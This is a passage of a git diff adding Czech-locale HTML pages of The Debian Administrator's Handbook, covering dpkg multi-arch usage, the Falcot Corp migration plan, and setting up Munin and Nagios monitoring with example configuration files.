+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg --print-architecture</code></strong>
+<code
+                class="computeroutput">amd64
+# </code><strong
+                class="userinput"><code>dpkg --print-foreign-architectures</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg -i gcc-6-base_6.3.0-18_armhf.deb</code></strong>
+<code
+                class="computeroutput">dpkg: error processing archive gcc-6-base_6.3.0-18_armhf.deb (--install):
+ package architecture (armhf) does not match system (amd64)
+Errors were encountered while processing:
+ gcc-6-base_6.3.0-18_armhf.deb
+# </code><strong
+                class="userinput"><code>dpkg --add-architecture armhf</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg --add-architecture armel</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg --print-foreign-architectures</code></strong>
+<code
+                class="computeroutput">armhf
+armel
+# </code><strong
+                class="userinput"><code>dpkg -i gcc-6-base_6.3.0-18_armhf.deb</code></strong>
+<code
+                class="computeroutput">Selecting previously unselected package gcc-6-base:armhf.
+(Reading database ... 112000 files and directories currently installed.)
+Preparing to unpack gcc-6-base_6.3.0-18_armhf.deb ...
+Unpacking gcc-6-base:armhf (6.3.0-18) ...
+Setting up gcc-6-base:armhf (6.3.0-18) ...
+# </code><strong
+                class="userinput"><code>dpkg --remove-architecture armhf</code></strong>
+<code
+                class="computeroutput">dpkg: error: cannot remove architecture 'armhf' currently in use by the database
+# </code><strong
+                class="userinput"><code>dpkg --remove-architecture armel</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg --print-foreign-architectures</code></strong>
+<code
+                class="computeroutput">armhf</code></pre><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> APT's multi-arch support</strong></p></div></div></div><div
+                class="para">
+					APT will automatically detect when dpkg has been configured to support foreign architectures and will start downloading the corresponding <code
+                  class="filename">Packages</code> files durings its update process.
+				</div><div
+                class="para">
+					Foreign packages can then be installed with <code
+                  class="command">apt install <em
+                    class="replaceable">package</em>:<em
+                    class="replaceable">architecture</em></code>.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Using proprietary i386 binaries on amd64</strong></p></div></div></div><div
+                class="para">
+					There are multiple use cases for multi-arch, but the most popular one is the possibility to execute 32 bit binaries (i386) on 64 bit systems (amd64).
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.8.9.7"></a>5.4.5.2. Multi-Arch Related Changes</h4></div></div></div><div
+              class="para">
+					To make multi-arch actually useful and usable, libraries had to be repackaged and moved to an architecture-specific directory so that multiple copies (targeting different architectures) can be installed alongside. Such updated packages contain the “<code
+                class="literal">Multi-Arch: same</code>” header field to tell the packaging system that the various architectures of the package can be safely co-installed (and that those packages can only satisfy dependencies of packages of the same architecture). The most important libraries have been converted since the introduction of multi-arch in Debian <span
+                class="distribution distribution">Wheezy</span>, but there are many libraries that will likely never be converted unless someone specifically requests it (through a bug report for example).
+				</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg -s gcc-6-base
+</code></strong><code
+                class="computeroutput">dpkg-query: error: --status needs a valid package name but 'gcc-6-base' is not: ambiguous package name 'gcc-6-base' with more than one installed instance
+
+Use --help for help about querying packages.
+$ </code><strong
+                class="userinput"><code>dpkg -s gcc-6-base:amd64 gcc-6-base:armhf | grep ^Multi
+</code></strong><code
+                class="computeroutput">Multi-Arch: same
+Multi-Arch: same
+$ </code><strong
+                class="userinput"><code>dpkg -L libgcc1:amd64 |grep .so
+</code></strong><code
+                class="computeroutput">/lib/x86_64-linux-gnu/libgcc_s.so.1
+$ </code><strong
+                class="userinput"><code>dpkg -S /usr/share/doc/gcc-6-base/copyright
+</code></strong><code
+                class="computeroutput">gcc-6-base:amd64, gcc-6-base:armhf: /usr/share/doc/gcc-6-base/copyright
+</code></pre><div
+              class="para">
+					It is worth noting that <code
+                class="literal">Multi-Arch: same</code> packages must have their names qualified with their architecture to be unambiguously identifiable. They also have the possibility to share files with other instances of the same package; <code
+                class="command">dpkg</code> ensures that all packages have bit-for-bit identical files when they are shared. Last but not least, all instances of a package must have the same version. They must thus be upgraded together.
+				</div><div
+              class="para">
+					Multi-Arch support also brings some interesting challenges in the way dependencies are handled. Satisfying a dependency requires either a package marked “<code
+                class="literal">Multi-Arch: foreign</code>” or a package whose architecture matches the one of the package declaring the dependency (in this dependency resolution process, architecture-independent packages are assumed to be of the same architecture than the host). A dependency can also be weakened to allow any architecture to fulfill it, with the <code
+                class="literal"><em
+                  class="replaceable">package</em>:any</code> syntax, but foreign packages can only satisfy such a dependency if they are marked “<code
+                class="literal">Multi-Arch: allowed</code>”.
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.source-package-structure.html"><strong>Předcházející</strong>5.3. Structure of a Source Package</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.coexistence-with-other-packaging-systems.html"><strong>Další</strong>5.5. Coexistence with Other Packaging Systems</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.master-plan.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.master-plan.html
new file mode 100644
index 000000000..6278d2e6a
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.master-plan.html
@@ -0,0 +1,101 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2.2. Master Plan</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="prev"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="next"
+        href="sect.why-gnu-linux.html"
+        title="2.3. Why a GNU/Linux Distribution?" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.master-plan.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="case-study.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-gnu-linux.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.master-plan"></a>2.2. Master Plan</h2></div></div></div><a
+          id="id-1.5.6.2"
+          class="indexterm"></a><a
+          id="id-1.5.6.3"
+          class="indexterm"></a><div
+          class="para">
+			With your collaboration, IT management has conducted a slightly more extensive study, identifying some constraints and defining a plan for migration to the chosen Open Source system, Debian.
+		</div><div
+          class="para">
+			A significant constraint identified is that the accounting department uses specific software, which only runs on <span
+            class="trademark">Microsoft Windows</span>™. The laboratory, for its part, uses computer aided design software that runs on <span
+            class="trademark">OS X</span>™.
+		</div><div
+          class="figure"><a
+            xmlns=""
+            id="id-1.5.6.6"></a><div
+            class="figure-contents"><div
+              class="mediaobject"><img
+                src="images/case-study.png"
+                alt="Overview of the Falcot Corp network" /></div></div><p
+            class="title"><strong>Obrázek 2.1. Overview of the Falcot Corp network</strong></p></div><div
+          class="para">
+			The switch to Debian will be gradual; a small business, with limited means, cannot reasonably change everything overnight. For starters, the IT staff must be trained in Debian administration. The servers will then be converted, starting with the network infrastructure (routers, firewalls, etc.) followed by the user services (file sharing, Web, SMTP, etc.). Then the office computers will be gradually migrated to Debian, for each department to be trained (internally) during the deployment of the new system.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="case-study.html"><strong>Předcházející</strong>Kapitola 2. Presenting the Case Study</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-gnu-linux.html"><strong>Další</strong>2.3. Why a GNU/Linux Distribution?</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.monitoring.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.monitoring.html
new file mode 100644
index 000000000..031757c7b
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.monitoring.html
@@ -0,0 +1,486 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">12.4. Monitoring</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="RAID, LVM, FAI, Preseeding, Monitoring, Virtualization, Xen, LXC" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><link
+        rel="prev"
+        href="sect.automated-installation.html"
+        title="12.3. Automated Installation" /><link
+        rel="next"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.monitoring.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.automated-installation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="workstation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.monitoring"></a>12.4. Monitoring</h2></div></div></div><div
+          class="para">
+			Monitoring is a generic term, and the various involved activities have several goals: on the one hand, following usage of the resources provided by a machine allows anticipating saturation and the subsequent required upgrades; on the other hand, alerting the administrator as soon as a service is unavailable or not working properly means that the problems that do happen can be fixed sooner.
+		</div><div
+          class="para">
+			<span
+            class="emphasis"><em>Munin</em></span> covers the first area, by displaying graphical charts for historical values of a number of parameters (used RAM, occupied disk space, processor load, network traffic, Apache/MySQL load, and so on). <span
+            class="emphasis"><em>Nagios</em></span> covers the second area, by regularly checking that the services are working and available, and sending alerts through the appropriate channels (e-mails, text messages, and so on). Both have a modular design, which makes it easy to create new plug-ins to monitor specific parameters or services.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Zabbix, an integrated monitoring tool</strong></p></div></div></div><a
+            id="id-1.15.7.4.2"
+            class="indexterm"></a><div
+            class="para">
+			Although Munin and Nagios are in very common use, they are not the only players in the monitoring field, and each of them only handles half of the task (graphing on one side, alerting on the other). Zabbix, on the other hand, integrates both parts of monitoring; it also has a web interface for configuring the most common aspects. It has grown by leaps and bounds during the last few years, and can now be considered a viable contender. On the monitoring server, you would install <span
+              class="pkg pkg">zabbix-server-pgsql</span> (or <span
+              class="pkg pkg">zabbix-server-mysql</span>), possibly together with <span
+              class="pkg pkg">zabbix-frontend-php</span> to have a web interface. On the hosts to monitor you would install <span
+              class="pkg pkg">zabbix-agent</span> feeding data back to the server. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.zabbix.com/">http://www.zabbix.com/</a></div>
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Icinga, a Nagios fork</strong></p></div></div></div><a
+            id="id-1.15.7.5.2"
+            class="indexterm"></a><div
+            class="para">
+			Spurred by divergences in opinions concerning the development model for Nagios (which is controlled by a company), a number of developers forked Nagios and use Icinga as their new name. Icinga is still compatible — so far — with Nagios configurations and plugins, but it also adds extra features. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.icinga.org/">http://www.icinga.org/</a></div>
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.munin"></a>12.4.1. Setting Up Munin</h3></div></div></div><a
+            id="id-1.15.7.6.2"
+            class="indexterm"></a><div
+            class="para">
+				The purpose of Munin is to monitor many machines; therefore, it quite naturally uses a client/server architecture. The central host — the grapher — collects data from all the monitored hosts, and generates historical graphs.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.7.6.4"></a>12.4.1.1. Configuring Hosts To Monitor</h4></div></div></div><div
+              class="para">
+					The first step is to install the <span
+                class="pkg pkg">munin-node</span> package. The daemon installed by this package listens on port 4949 and sends back the data collected by all the active plugins. Each plugin is a simple program returning a description of the collected data as well as the latest measured value. Plugins are stored in <code
+                class="filename">/usr/share/munin/plugins/</code>, but only those with a symbolic link in <code
+                class="filename">/etc/munin/plugins/</code> are really used.
+				</div><div
+              class="para">
+					When the package is installed, a set of active plugins is determined based on the available software and the current configuration of the host. However, this autoconfiguration depends on a feature that each plugin must provide, and it is usually a good idea to review and tweak the results by hand. Browsing the <a
+                href="http://gallery.munin-monitoring.org">Plugin Gallery</a> can be interesting even though not all plugins have comprehensive documentation. However, all plugins are scripts and most are rather simple and well-commented. Browsing <code
+                class="filename">/etc/munin/plugins/</code> is therefore a good way of getting an idea of what each plugin is about and determining which should be removed. Similarly, enabling an interesting plugin found in <code
+                class="filename">/usr/share/munin/plugins/</code> is a simple matter of setting up a symbolic link with <code
+                class="command">ln -sf /usr/share/munin/plugins/<em
+                  class="replaceable">plugin</em> /etc/munin/plugins/</code>. Note that when a plugin name ends with an underscore “_”, the plugin requires a parameter. This parameter must be stored in the name of the symbolic link; for instance, the “if_” plugin must be enabled with a <code
+                class="filename">if_eth0</code> symbolic link, and it will monitor network traffic on the eth0 interface.
+				</div><div
+              class="para">
+					Once all plugins are correctly set up, the daemon configuration must be updated to describe access control for the collected data. This involves <code
+                class="literal">allow</code> directives in the <code
+                class="filename">/etc/munin/munin-node.conf</code> file. The default configuration is <code
+                class="literal">allow ^127\.0\.0\.1$</code>, and only allows access to the local host. An administrator will usually add a similar line containing the IP address of the grapher host, then restart the daemon with <code
+                class="command">service munin-node restart</code>.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Creating local plugins</strong></p></div></div></div><div
+                class="para">
+					Munin does include detailed documentation on how plugins should behave, and how to develop new plugins. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://munin-monitoring.org/wiki/plugins">http://munin-monitoring.org/wiki/plugins</a></div>
+				</div><div
+                class="para">
+					A plugin is best tested when run in the same conditions as it would be when triggered by munin-node; this can be simulated by running <code
+                  class="command">munin-run <em
+                    class="replaceable">plugin</em></code> as root. A potential second parameter given to this command (such as <code
+                  class="literal">config</code>) is passed to the plugin as a parameter.
+				</div><div
+                class="para">
+					When a plugin is invoked with the <code
+                  class="literal">config</code> parameter, it must describe itself by returning a set of fields:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>sudo munin-run load config
+</code></strong><code
+                  class="computeroutput">graph_title Load average
+graph_args --base 1000 -l 0
+graph_vlabel load
+graph_scale no
+graph_category system
+load.label load
+graph_info The load average of the machine describes how many processes are in the run-queue (scheduled to run "immediately").
+load.info 5 minute load average
+</code></pre><div
+                class="para">
+					The various available fields are described by the “Plugin reference” available as part of the “Munin guide”. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://munin.readthedocs.org/en/latest/reference/plugin.html">http://munin.readthedocs.org/en/latest/reference/plugin.html</a></div>
+				</div><div
+                class="para">
+					When invoked without a parameter, the plugin simply returns the last measured values; for instance, executing <code
+                  class="command">sudo munin-run load</code> could return <code
+                  class="literal">load.value 0.12</code>.
+				</div><div
+                class="para">
+					Finally, when a plugin is invoked with the <code
+                  class="literal">autoconf</code> parameter, it should return “yes” (and a 0 exit status) or “no” (with a 1 exit status) according to whether the plugin should be enabled on this host.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.7.6.5"></a>12.4.1.2. Configuring the Grapher</h4></div></div></div><div
+              class="para">
+					The “grapher” is simply the computer that aggregates the data and generates the corresponding graphs. The required software is in the <span
+                class="pkg pkg">munin</span> package. The standard configuration runs <code
+                class="command">munin-cron</code> (once every 5 minutes), which gathers data from all the hosts listed in <code
+                class="filename">/etc/munin/munin.conf</code> (only the local host is listed by default), saves the historical data in RRD files (<span
+                class="emphasis"><em>Round Robin Database</em></span>, a file format designed to store data varying in time) stored under <code
+                class="filename">/var/lib/munin/</code> and generates an HTML page with the graphs in <code
+                class="filename">/var/cache/munin/www/</code>.
+				</div><div
+              class="para">
+					All monitored machines must therefore be listed in the <code
+                class="filename">/etc/munin/munin.conf</code> configuration file. Each machine is listed as a full section with a name matching the machine and at least an <code
+                class="literal">address</code> entry giving the corresponding IP address.
+				</div><pre
+              class="programlisting">[ftp.falcot.com]
+    address 192.168.0.12
+    use_node_name yes
+</pre><div
+              class="para">
+					Sections can be more complex, and describe extra graphs that could be created by combining data coming from several machines. The samples provided in the configuration file are good starting points for customization.
+				</div><div
+              class="para">
+					The last step is to publish the generated pages; this involves configuring a web server so that the contents of <code
+                class="filename">/var/cache/munin/www/</code> are made available on a website. Access to this website will often be restricted, using either an authentication mechanism or IP-based access control. See <a
+                class="xref"
+                href="sect.http-web-server.html">11.2 – „Web Server (HTTP)“</a> for the relevant details.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.nagios"></a>12.4.2. Setting Up Nagios</h3></div></div></div><a
+            id="id-1.15.7.7.2"
+            class="indexterm"></a><div
+            class="para">
+				Unlike Munin, Nagios does not necessarily require installing anything on the monitored hosts; most of the time, Nagios is used to check the availability of network services. For instance, Nagios can connect to a web server and check that a given web page can be obtained within a given time.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.7.7.4"></a>12.4.2.1. Installing</h4></div></div></div><div
+              class="para">
+					The first step in setting up Nagios is to install the <span
+                class="pkg pkg">nagios3</span>, <span
+                class="pkg pkg">nagios-plugins</span> and <span
+                class="pkg pkg">nagios3-doc</span> packages. Installing the packages configures the web interface and creates a first <code
+                class="literal">nagiosadmin</code> user (for which it asks for a password). Adding other users is a simple matter of inserting them in the <code
+                class="filename">/etc/nagios3/htpasswd.users</code> file with Apache's <code
+                class="command">htpasswd</code> command. If no Debconf question was displayed during installation, <code
+                class="command">dpkg-reconfigure nagios3-cgi</code> can be used to define the <code
+                class="literal">nagiosadmin</code> password.
+				</div><div
+              class="para">
+					Pointing a browser at <code
+                class="literal">http://<em
+                  class="replaceable">server</em>/nagios3/</code> displays the web interface; in particular, note that Nagios already monitors some parameters of the machine where it runs. However, some interactive features such as adding comments to a host do not work. These features are disabled in the default configuration for Nagios, which is very restrictive for security reasons.
+				</div><div
+              class="para">
+					As documented in <code
+                class="filename">/usr/share/doc/nagios3/README.Debian</code>, enabling some features involves editing <code
+                class="filename">/etc/nagios3/nagios.cfg</code> and setting its <code
+                class="literal">check_external_commands</code> parameter to “1”. We also need to set up write permissions for the directory used by Nagios, with commands such as the following:
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>service nagios3 stop</code></strong>
+<code
+                class="computeroutput">[...]
+# </code><strong
+                class="userinput"><code>dpkg-statoverride --update --add nagios www-data 2710 /var/lib/nagios3/rw
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg-statoverride --update --add nagios nagios 751 /var/lib/nagios3
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>service nagios3 start</code></strong>
+<code
+                class="computeroutput">[...]</code></pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.7.7.5"></a>12.4.2.2. Configuring</h4></div></div></div><div
+              class="para">
+					The Nagios web interface is rather nice, but it does not allow configuration, nor can it be used to add monitored hosts and services. The whole configuration is managed via files referenced in the central configuration file, <code
+                class="filename">/etc/nagios3/nagios.cfg</code>.
+				</div><div
+              class="para">
+					These files should not be dived into without some understanding of the Nagios concepts. The configuration lists objects of the following types:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>host</em></span> is a machine to be monitored;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>hostgroup</em></span> is a set of hosts that should be grouped together for display, or to factor some common configuration elements;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>service</em></span> is a testable element related to a host or a host group. It will most often be a check for a network service, but it can also involve checking that some parameters are within an acceptable range (for instance, free disk space or processor load);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>servicegroup</em></span> is a set of services that should be grouped together for display;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>contact</em></span> is a person who can receive alerts;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>contactgroup</em></span> is a set of such contacts;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>timeperiod</em></span> is a range of time during which some services have to be checked;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>command</em></span> is the command line invoked to check a given service.
+						</div></li></ul></div><div
+              class="para">
+					According to its type, each object has a number of properties that can be customized. A full list would be too long to include, but the most important properties are the relations between the objects.
+				</div><div
+              class="para">
+					A <span
+                class="emphasis"><em>service</em></span> uses a <span
+                class="emphasis"><em>command</em></span> to check the state of a feature on a <span
+                class="emphasis"><em>host</em></span> (or a <span
+                class="emphasis"><em>hostgroup</em></span>) within a <span
+                class="emphasis"><em>timeperiod</em></span>. In case of a problem, Nagios sends an alert to all members of the <span
+                class="emphasis"><em>contactgroup</em></span> linked to the service. Each member is sent the alert according to the channel described in the matching <span
+                class="emphasis"><em>contact</em></span> object.
+				</div><div
+              class="para">
+					An inheritance system allows easy sharing of a set of properties across many objects without duplicating information. Moreover, the initial configuration includes a number of standard objects; in many cases, defining new hosts, services and contacts is a simple matter of deriving from the provided generic objects. The files in <code
+                class="filename">/etc/nagios3/conf.d/</code> are a good source of information on how they work.
+				</div><div
+              class="para">
+					The Falcot Corp administrators use the following configuration:
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.15.7.7.5.9"></a><p
+                class="title"><strong>Příklad 12.3. <code
+                    class="filename">/etc/nagios3/conf.d/falcot.cfg</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">define contact{
+    name                            generic-contact
+    service_notification_period     24x7
+    host_notification_period        24x7
+    service_notification_options    w,u,c,r
+    host_notification_options       d,u,r
+    service_notification_commands   notify-service-by-email
+    host_notification_commands      notify-host-by-email
+    register                        0 ; Template only
+}
+define contact{
+    use             generic-contact
+    contact_name    rhertzog
+    alias           Raphael Hertzog
+    email           hertzog@debian.org
+}
+define contact{
+    use             generic-contact
+    contact_name    rmas
+    alias           Roland Mas
+    email           lolando@debian.org
+}
+
+define contactgroup{
+    contactgroup_name     falcot-admins
+    alias                 Falcot Administrators
+    members               rhertzog,rmas
+}
+
+define host{
+    use                   generic-host ; Name of host template to use
+    host_name             www-host
+    alias                 www.falcot.com
+    address               192.168.0.5
+    contact_groups        falcot-admins
+    hostgroups            debian-servers,ssh-servers
+}
+define host{
+    use                   generic-host ; Name of host template to use
+    host_name             ftp-host
+    alias                 ftp.falcot.com
+    address               192.168.0.6
+    contact_groups        falcot-admins
+    hostgroups            debian-servers,ssh-servers
+}
+
+# 'check_ftp' command with custom parameters
+define command{
+    command_name          check_ftp2
+    command_line          /usr/lib/nagios/plugins/check_ftp -H $HOSTADDRESS$ -w 20 -c 30 -t 35
+}
+
+# Generic Falcot service
+define service{
+    name                  falcot-service
+    use                   generic-service
+    contact_groups        falcot-admins
+    register              0
+}
+
+# Services to check on www-host
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   HTTP
+    check_command         check_http
+}
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   HTTPS
+    check_command         check_https
+}
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   SMTP
+    check_command         check_smtp
+}
+
+# Services to check on ftp-host
+define service{
+    use                   falcot-service
+    host_name             ftp-host
+    service_description   FTP
+    check_command         check_ftp2
+}
+</pre></div></div><div
+              class="para">
+					This configuration file describes two monitored hosts. The first one is the web server, and the checks are made on the HTTP (80) and secure-HTTP (443) ports. Nagios also checks that an SMTP server runs on port 25. The second host is the FTP server, and the check includes making sure that a reply comes within 20 seconds. Beyond this delay, a <span
+                class="emphasis"><em>warning</em></span> is emitted; beyond 30 seconds, the alert is deemed critical. The Nagios web interface also shows that the SSH service is monitored: this comes from the hosts belonging to the <code
+                class="literal">ssh-servers</code> hostgroup. The matching standard service is defined in <code
+                class="filename">/etc/nagios3/conf.d/services_nagios2.cfg</code>.
+				</div><div
+              class="para">
+					Note the use of inheritance: an object is made to inherit from another object with the “use <em
+                class="replaceable">parent-name</em>”. The parent object must be identifiable, which requires giving it a “name <em
+                class="replaceable">identifier</em>” property. If the parent object is not meant to be a real object, but only to serve as a parent, giving it a “register 0” property tells Nagios not to consider it, and therefore to ignore the lack of some parameters that would otherwise be required.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DOCUMENTATION</em></span> List of object properties</strong></p></div></div></div><div
+                class="para">
+					A more in-depth understanding of the various ways in which Nagios can be configured can be obtained from the documentation provided by the <span
+                  class="pkg pkg">nagios3-doc</span> package. This documentation is directly accessible from the web interface, with the “Documentation” link in the top left corner. It includes a list of all object types, with all the properties they can have. It also explains how to create new plugins.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Remote tests with NRPE</strong></p></div></div></div><div
+                class="para">
+					Many Nagios plugins allow checking some parameters local to a host; if many machines need these checks while a central installation gathers them, the NRPE (<span
+                  class="emphasis"><em>Nagios Remote Plugin Executor</em></span>) plugin needs to be deployed. The <span
+                  class="pkg pkg">nagios-nrpe-plugin</span> package needs to be installed on the Nagios server, and <span
+                  class="pkg pkg">nagios-nrpe-server</span> on the hosts where local tests need to run. The latter gets its configuration from <code
+                  class="filename">/etc/nagios/nrpe.cfg</code>. This file should list the tests that can be started remotely, and the IP addresses of the machines allowed to trigger them. On the Nagios side, enabling these remote tests is a simple matter of adding matching services using the new <span
+                  class="emphasis"><em>check_nrpe</em></span> command.
